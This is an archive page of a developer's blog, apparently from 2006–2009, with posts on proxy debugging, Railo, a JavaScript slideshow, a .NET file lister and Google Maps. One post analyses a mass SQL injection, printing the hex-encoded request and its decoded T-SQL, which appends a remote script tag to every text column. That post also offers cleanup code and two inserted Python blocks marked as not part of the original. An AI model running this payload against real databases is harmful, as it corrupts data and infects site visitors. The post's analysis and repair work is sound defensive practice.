Archive for the ‘web’ Category

Proxy your connections for debugging

Monday, February 23rd, 2009

One of the tricky things about having Flash or Ajax client applications that request data on their own is knowing what they are requesting and when. I went nuts today trying to figure out whether my Ajax was making the right calls and getting back data, 404 messages, or nothing at all. That was until I remembered Squid.

Squid is a simple proxy server used in the Unix world for logging or filtering web content, but it can be very handy as a desktop tool for debugging rich internet applications.


Looking around, I found this great installer and GUI front end for Squid for OSX called SquidMan.

When you first launch SquidMan it will prompt you to install the Squid subsystem. Just click OK, enter your password, and it will bring up the settings:

You can leave all of the settings at their defaults.

Then from the main dialog, click “Start Squid”

In firefox, find the network settings under the Advanced tab:

Enter your local computer (127.0.0.1) as the proxy host:

This will now force all of your Firefox traffic to go through the Squid proxy. From the main SquidMan application settings, you can now choose “Tools” and see a log of every URL that is requested by JavaScript or Flash within your browser:

The whole web is malware today

Saturday, January 31st, 2009

Is it just me, or is Google reporting all sites as Malware for everyone today?

screenshot of google

Railo joins JBoss. How did I miss this?

Thursday, November 20th, 2008

I spend most of my days lately doing enterprise-ish type stuff in Java. Way back in the day though, my first paying programming job was writing Cold Fusion during the first dot-com upsurge. Since then I have always had a bit of a soft spot for CFML. I still think it is one of the best languages for non-pro programmers to write pages in and for professionals to do quick mock-ups with. When compared to PHP I think it is generally a better framework for prototyping and simple applications.

The one thing that has always kept me, and I’m sure many others, from choosing CFM for anything was the fact that the license costs over $1000 and not many web-hosts support it.

I sort of always thought Macromedia would open source Cold Fusion and I’m somewhat surprised Adobe hasn’t made moves in this direction. Over the past few years several projects have made some headway in building an open source alternative. The Smith project looked like it was the best option until it seemed to fizzle out earlier this year. Now, after clicking around I noticed a press release that Railo has joined JBoss and will be open sourced!

This is huge news if you are a fan of CFM. JBoss has a lot of clout and resources to get things done. I expect that they will release something that is solid and eventually competes on par with the offerings from Adobe itself.

This, combined with the progress people have made running other languages on the JVM – Groovy, Scala, Ruby, PHP, and Python – makes Java application servers a clear choice for running all sorts of scripted sites on true application servers.

Now, will someone please open source a port of ASP classic so I can host all my legacy apps on Linux? (Sun, I’m looking at you. Who is paying for Sun Java System ASP anyway?)

Javascript Image Morph

Sunday, November 16th, 2008

I’ve been working on an image gallery and needed a way to do nice fade/morphs between a list of images for a slideshow. I used Prototype and script.aculo.us. Here is how I did it:

See the Demo Here

Download Entire Source of Example

Javascript to do the work:

// preload the images and load them into an array
var imageArray = [];
 
var image01 = new Image();
image01.src = 'photo_01.jpg';
imageArray[imageArray.length] = image01;
 
var image02 = new Image();
image02.src = 'photo_02.jpg';
imageArray[imageArray.length] = image02;
 
var image03 = new Image();
image03.src = 'photo_03.jpg';
imageArray[imageArray.length] = image03;
 
var image04 = new Image();
image04.src = 'photo_04.jpg';
imageArray[imageArray.length] = image04;
 
var image05 = new Image();
image05.src = 'photo_05.jpg';
imageArray[imageArray.length] = image05;
 
// imageIndex is going to be the index of the next image to display.  
// images 0 and 1 are already loaded into the html
var imageIndex = 1;
 
function switchImage() {
	// place the next image to be displayed to the front
	$('imageFront').src = imageArray[imageIndex].src;
 
	// make the image in front appear, when it is done swap it with the image in the back
	new Effect.Appear('imageFront', {
		afterFinish: function() { 
			// make the image in the back the same src as the image in the front
			$('imageBehind').src = $('imageFront').src;
			
			//hide the image in the front
			$('imageFront').style.display = 'none';
			
			// increment the index
			imageIndex++;
			// if we have indexed past the end of the array, go back to zero
			if (imageIndex == imageArray.length) { 
				imageIndex = 0;
			}
		}
	});
}

Within the HTML, the only tricky thing here is that you need to position the two IMG tags so they are on top of each other. For my purpose absolute positioning was okay. It may take a little more work for relative positioning.

<html>
<head>
	<script type="text/javascript" src="js/prototype.js"></script>
	<script type="text/javascript" src="js/scriptaculous.js?load=effects"></script>
	<script type="text/javascript">
		/* code from above goes here */
	</script>
</head>
<body onload="setInterval(switchImage, 3000);">
	<img id="imageBehind" src="photo_01.jpg" style="position:absolute; top:0; left:0;" />
	<img id="imageFront" src="photo_02.jpg" style="position:absolute; top:0; left:0; display:none;" />
</body>
</html>

** update. thanks to Star for letting me know that the morph blinked in Firefox 2.0. I fixed the post and the example so it doesn’t do that anymore. **

Simple .NET script to list all of the .swf files in a folder as XML

Thursday, November 13th, 2008

Here is some handy code for when you have a bunch of .swf files and need some XML to load them into Flash. It should also be easy to change the script to list any other file type you need enumerated.

<%@ Page ContentType="text/xml" %>
<%@ Import Namespace="System.Xml" %>
<%@ Import Namespace="System.IO" %>
<script language="C#" runat="server">
	void Page_Load(object sender, System.EventArgs e) {
		XmlWriter writer = XmlWriter.Create(Response.OutputStream);
		
		writer.WriteStartElement("scenes");
		DirectoryInfo di = new DirectoryInfo(Server.MapPath(""));
		FileInfo[] files = di.GetFiles("*.swf");
		foreach(FileInfo fi in files) {
			
			writer.WriteStartElement("movie");
			writer.WriteAttributeString("name", fi.Name);
			writer.WriteEndElement();
 
		}
		writer.WriteEndElement();
 
		writer.Close();
	}
</script>

This will output something like:

<?xml version="1.0" encoding="utf-8"?>
<scenes>
    <movie name="scene_001.swf"/>
    <movie name="scene_002.swf"/>
    <movie name="scene_003.swf"/>
    <movie name="scene_004.swf"/>
    <movie name="scene_005.swf"/>
    <movie name="scene_006.swf"/>
</scenes>

Using SQL Injection attack code to repair database

Thursday, September 25th, 2008

Now that Google has started flagging sites that are linking to badware in their index I’ve been getting quite a few calls from people who have been flagged and need to get back on track.

These are often sites that were written a while back (not by myself) when developers didn’t think as much about SQL injection as they do now. Sometimes the code was just poorly written by someone who didn’t know better. However it happened, each site has its own challenge.

Fixing the security hole is generally straightforward — I usually just have to identify where the SQL isn’t properly escaped and fix that code. The hard part I have had fixing these sites is fixing the database itself. Some clients have backups, and some I can fix with SQL Log Rescue, but generally a lot of small clients simply don’t have great control over their server and often don’t have any backups.

I had one such client this week whose database had hundreds and hundreds of tables, all with malware code injected into the data. I was initially going to write a script to clean all the data, but after looking at the malware attack, I was able to use their own code to fix the database.

In the server log files, I noticed this request coming in for every script several times a day. It looks like it just wanders the internet hoping that the id=2 in the query string won’t be escaped in the code.

GET script.asp?id=2 ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434c415245204054207661726368617228323535292c40432076617263686172283430303029204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f7777772e776972656c7573742e636f6d2f626164646965732d7363726970742e6a73223e3c2f7363726970743e3c212d2d27272b5b272b40432b275d20776865726520272b40432b27206e6f74206c696b6520272725223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f7777772e776972656c7573742e636f6d2f626164646965732d7363726970742e6a73223e3c2f7363726970743e3c212d2d272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f7220%20AS%20CHAR(4000));EXEC(@S); 80 - 121.18.89.190 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) - - www.wirelust.com 200 0 0 14827 1516 9781
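As an added example that is not part of the original post: a small Python scanner for IIS-style log lines that spots the CAST(0x... AS CHAR) trick in the request above and decodes the hex offline, so you can read what a request would have executed without ever running it on a SQL server. The log lines, hostnames, addresses and the short payload text it embeds are constructed stand-ins, not the real ones from the post.

```python
import re
from urllib.parse import unquote_plus

# Constructed stand-in for the SQL the real request carried, hex-encoded the
# same way: CAST(0x... AS CHAR(4000)) followed by EXEC(@S).
SAMPLE_PAYLOAD_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(4000) "
    "EXEC('update ['+@T+'] set ['+@C+']=''<script src=\"http://malware.example/s.js\">"
    "</script>''+['+@C+']')"
)
SAMPLE_HEX = SAMPLE_PAYLOAD_SQL.encode("ascii").hex().upper()

# Constructed IIS-style log lines; hostnames and addresses are documentation values.
SAMPLE_LOG_LINES = [
    ("GET /script.asp?id=2 ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x" + SAMPLE_HEX
     + "%20AS%20CHAR(4000));EXEC(@S); 80 - 198.51.100.7 HTTP/1.1 "
       "Mozilla/4.0+(compatible;+MSIE+6.0) - - www.example.com 200 0 0"),
    "GET /script.asp?id=2 80 - 198.51.100.8 HTTP/1.1 Mozilla/5.0 - - www.example.com 200 0 0",
    "GET /about.asp?page=3 80 - 198.51.100.9 HTTP/1.1 Mozilla/5.0 - - www.example.com 200 0 0",
]

# A CAST of a 0x literal to (N)(VAR)CHAR, which is how the payload keeps its
# keywords out of the raw query string. Group 1 is the hex, group 2 the N prefix.
HEX_CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)
EXEC_RE = re.compile(r"\bEXEC\s*\(\s*@\w+\s*\)", re.IGNORECASE)
SRC_RE = re.compile(r"""src=["']?(https?://[^"'\s>]+)""", re.IGNORECASE)


def decode_sql_hex(hex_digits, wide):
    """Decode a SQL Server binary literal the way CAST(... AS CHAR/NCHAR) would."""
    if len(hex_digits) % 2:          # SQL Server left-pads odd-length literals
        hex_digits = "0" + hex_digits
    raw = bytes.fromhex(hex_digits)
    return raw.decode("utf-16-le", "replace") if wide else raw.decode("latin-1")


def scan_log_line(line):
    """Return a finding for a hex-cast SQL payload in one log line, or None."""
    request = unquote_plus(line)      # undo %20 / + encoding before matching
    cast = HEX_CAST_RE.search(request)
    if cast is None or EXEC_RE.search(request) is None:
        return None
    payload = decode_sql_hex(cast.group(1), wide=bool(cast.group(2)))
    return {
        "line": line,
        "payload": payload,
        "script_urls": SRC_RE.findall(payload),   # what the injected data would load
    }


def scan_log(lines):
    """Scan many log lines; returns only the findings for lines that carried a payload."""
    return [f for f in (scan_log_line(l) for l in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print("hit:", finding["line"][:60], "...")
        print("decoded payload:", finding["payload"])
        print("remote scripts referenced:", finding["script_urls"])
```

Run over a real access log, each finding gives you the decoded statement and any remote script URL it references, which is what you need to confirm what happened, block the source, and know exactly which string to search the database for.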

 

If the id isn’t escaped, as it wasn’t in this situation, a query like this will hit your SQL server:

SELECT *
FROM SomeTable
WHERE id=2;DECLARE @S CHAR(4000)
SET @S=CAST(0x4445434c415245204054207661726368617228323535292c40432076617263686172283430303029204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f7777772e776972656c7573742e636f6d2f626164646965732d7363726970742e6a73223e3c2f7363726970743e3c212d2d27272b5b272b40432b275d20776865726520272b40432b27206e6f74206c696b6520272725223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f7777772e776972656c7573742e636f6d2f626164646965732d7363726970742e6a73223e3c2f7363726970743e3c212d2d272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f7220 AS CHAR(4000));
EXEC(@S);

 

Hmm, okay. So what is it executing as the value of @S?
If you change the statement from EXEC(@S) to PRINT(@S) you get this:
Warning: Do not run this on your server, it will mess up ALL of your data

DECLARE @T VARCHAR(255),@C VARCHAR(4000)
DECLARE Table_Cursor CURSOR FOR 
	SELECT a.name,b.name
	FROM sysobjects a,syscolumns b
	WHERE a.id=b.id
	and a.xtype='u'
	and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
 
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
	EXEC('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www.wirelust.com/baddies-script.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www.wirelust.com/baddies-script.js"></script><!--''')
	FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

 

I thought this code was pretty clever. It selects a cursor that contains every varchar and text field in every table on the database, then loops over the cursor and issues an update command to append their bad script to the end of the data in each field.

Luckily, it is in their best interest to leave your data in place and just place their code at the end – it increases the chance you won’t know your site is infected.

Since all of the original data is still in the database, I was able to tweak their code a little bit to write a script to fix the data:

DECLARE @T VARCHAR(255), @C VARCHAR(4000), @SQL VARCHAR(5000)
DECLARE Table_Cursor CURSOR FOR
	SELECT a.name,b.name
	FROM sysobjects a,syscolumns b
	WHERE a.id=b.id
	and a.xtype='u'
	and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
	-- strip the injected script tag from this column; the column name is
	-- bracketed in the where clause too, so names with spaces or keywords work
	SET @SQL = 'update ['+@T+'] set ['+@C+']=Replace(['+@C+'], ''<script src="http://www.wirelust.com/baddies-script.js"></script>'', '''') where ['+@C+'] like ''%<script src="http://www.wirelust.com/baddies-script.js"></script>%'''
	PRINT @SQL
	-- dry run: inspect the printed statements first, then uncomment to apply
	-- exec(@SQL)
	FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
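One caveat on the repair above: the attack wraps its script tag in "></title> before and <!-- after, and the Replace only removes the tag itself, so the two fragments that close the page’s title and comment out the rest of the content stay in the data. As an added example, not from the original post, here is a Python cleaner that strips the whole fragment, or the residue a tag-only Replace leaves behind, from column values, removing every occurrence in case it was inserted more than once. The script URL is the one from the decoded payload in the post; the sample rows are constructed.

```python
import re

# Script URL from the decoded payload; the cleaner is parameterised on it so
# the same code works for a campaign that points at a different host.
SCRIPT_URL = "http://www.wirelust.com/baddies-script.js"

# Constructed sample rows standing in for one text column after the attack ran.
# Row 3 is what a Replace that only removes the <script> tag leaves behind:
# '"></title>' and '<!--' are still there and still break the page.
INJECTED = '"></title><script src="%s"></script><!--' % SCRIPT_URL
SAMPLE_ROWS = [
    {"id": 1, "body": INJECTED + "Welcome to our site"},
    {"id": 2, "body": "Untouched text"},
    {"id": 3, "body": '"></title><!--Opening hours: 9-5'},
    {"id": 4, "body": None},
]


def make_cleaner(script_url):
    """Build a function that strips the injected fragment (full or residual) from a value."""
    marker = re.compile(
        r'"></title>(?:<script src="%s"></script>)?<!--' % re.escape(script_url)
    )

    def clean(value):
        # Returns (cleaned_value, fragments_removed); NULL columns pass through untouched.
        if value is None:
            return None, 0
        return marker.subn("", value)

    return clean


def clean_rows(rows, column, clean):
    """Apply the cleaner to one column of a row set; returns (new_rows, cells_changed)."""
    changed = 0
    out = []
    for row in rows:
        new_value, n = clean(row[column])
        changed += 1 if n else 0
        out.append({**row, column: new_value})
    return out, changed


if __name__ == "__main__":
    cleaned, count = clean_rows(SAMPLE_ROWS, "body", make_cleaner(SCRIPT_URL))
    print("cells repaired:", count)
    for row in cleaned:
        print(row)
```

The pattern is anchored on the exact fragment the attack writes rather than on any <script> tag, so legitimate content that happens to contain markup is left alone; the cleaner is also idempotent, so re-running it over already repaired rows changes nothing.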

Google Maps You Have Failed Me

Thursday, December 7th, 2006

Today I had to meet at a client’s office that I had never been to before. Given that I have 100% faith in technology, I mapped out the directions using a map I had created for the client as my starting point. When I got there I was in the totally incorrect place (a first for me when using Google). I opened up Google Maps on my phone and was able to get directions from the incorrect address to the correct one. I assumed at the time that the original map had the incorrect address typed in on it.

When I got back to the office I tried to fix the client’s site and found myself unable to. It turns out that the maps that Google spits out for its embedded API are different from the maps that Google’s own site uses. I searched and searched and couldn’t find any reference to this anywhere on the web. I will search more after this post.

Here is the map that Google’s site spits out for the address I am searching for:

Here is the map that Google’s API returns for the same area:

It seems that Google’s site and Google Mobile are using map data from Navteq, while the API is using map data from TeleAtlas.

Interestingly though, the TeleAtlas data appears to be correct and more up to date, but the geocoding for the address is only correct on the Navteq map.

The geocode for the same address on the more up to date map is three miles off.

For good measure I checked out the Yahoo API, which says that it uses data from TeleAtlas and/or Navteq. It appears to be just Navteq though:

Anyone know anything more about this?

Also, taking screen shots I realize just how 1337 I really am, or messy, ha.